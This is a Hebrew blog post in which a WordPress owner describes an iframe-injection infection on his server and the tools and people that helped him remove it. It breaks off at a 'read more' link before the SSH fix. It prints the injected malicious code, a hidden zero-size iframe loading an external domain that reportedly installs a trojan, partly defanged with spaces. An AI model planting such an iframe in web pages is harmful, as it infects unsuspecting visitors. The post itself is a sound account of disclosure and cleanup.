אבטחה בוורדפרס – כיצד להסיר iframe injections באמצעות SSH

http://weblogtoolscollection.com/archives/2009/06/15/security-and-anti-spam-plugins-for-wordpress/(זהירות: פוטס טכני לחובבי הוורדפרס מבינינו)

אז לאחר שגיליתי שהבלוג שלי נדבק בווירוס, יצאתי לחפש אחר פתרון ובפוסט זה אני מביע תודה לכל אלו שעזרו ומקווה לסייע לאחרים בעתיד שיתקלו בבעיות דומות.

הבעיה הייתה שאיכשהו (כנראה פריצה לאחד היוזרים של ה- FTP של השרת שלי) איזשהו בוט נכנס לשרת והכניס לקבצים שבשרת שורת קוד שטוענת אתר (iframe) בתוך כל אחד מהאתרים שלי, האתר הזה מתקין איזשהו סוס טרויאני (לא ברור איזה), וזיהם את רוב (אם לא כל) הקבצים שעל השרת.

הקוד הזדוני נראה כך (הדרך שבה הדבקתי אותו אמורה לסרס את פעולת הקוד, אבל לא הייתי ממליץ להכנס ללינק ללא אנטיווירוס מותקן):

<iframe src="http:// m-analytics . net /qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

כיצד מצאתי את הפתרון:

  1. פניתי לחברי בפייסבוק, טוויטר, קבוצת העזרה של וורדפרס העולמית וקבוצת הדיון של וורדפרס בעברית לבקש עזרה. אף אחד לא נתן את הפתרון המדויק, אבל שילוב של הפתרונות הביא לסיום הפרשה. אני רוצה להודות לדותן מזור ואיתן ברקט (ששילוב הטיפים שלהם הוא שפתר לי את רוב התעלומה – ראו סעיף 5), לצפריר ריהן (שנתן טיפים כלליים טובים),  לתומר כהן, לאלעד (על הרצון הטוב), ניצן בן-נון (שנתן כיוונים מעולים והפתרון שלו כמעט עבד, אבל לא הצלחתי ליישם אותו כלשונו), לדוד גור ולאריק וגליה (שרצו לעזור, אבל לא הספיקו לעזור לפני האחרים).  (דוד, ניצן וגליה – איני יודע מה הלינקים לבלוגים שלכם, תשלחו ותקבלו)
  2. כדי לוודא בכל שלב של הניסוי האם אני מצליח או לא, השתמשתי באתר "הסר מסכות טפילים" שמגלה האם יש באתר כלשהו עדות ללינקים חבויים או דברים שמעלים חשד של פריצה לאתר.
  3. התקנתי על הוורדפרס את התוסף WordPress Exploit Scanner אליו הגעתי דרך הפוסט Security And Anti-spam Plugins For WordPress – זהו תוסף שמאפשר לגלות קבצים "מזוהמים" בוורדפרס. מה שאיפשר לי לזהות איפה נמצאו הלינקים שיש להוריד.
  4. מצאתי באינטרנט מישהו אחר שנתן הוראות (שלא בדיוק עבדו) לפתרון בעיה דומה של החדרת קוד זדוני של iframe, http://fieldsmarshall.com/htmliframe-inf-wordpress-infection/ שם קיבלתי אישור שהכיוון הכללי הוא הנכון.
  5. קיבלתי הפניה לאתר (המצויין) http://www.commandlinefu.com שאפשר בתוכו למצוא אוצרות בלומים של איך לעשות מה עם פקודות ב- SSH (שזה בדיוק מה שנזדקקתי לו) (את זה שלח לי דותן, ובשילוב עם העזרה הכללית בקוד הרג'אקס דרך איתן – הבעיה נפטרה)

מהו הפתרון

להמשיך לקרוא אבטחה בוורדפרס – כיצד להסיר iframe injections באמצעות SSH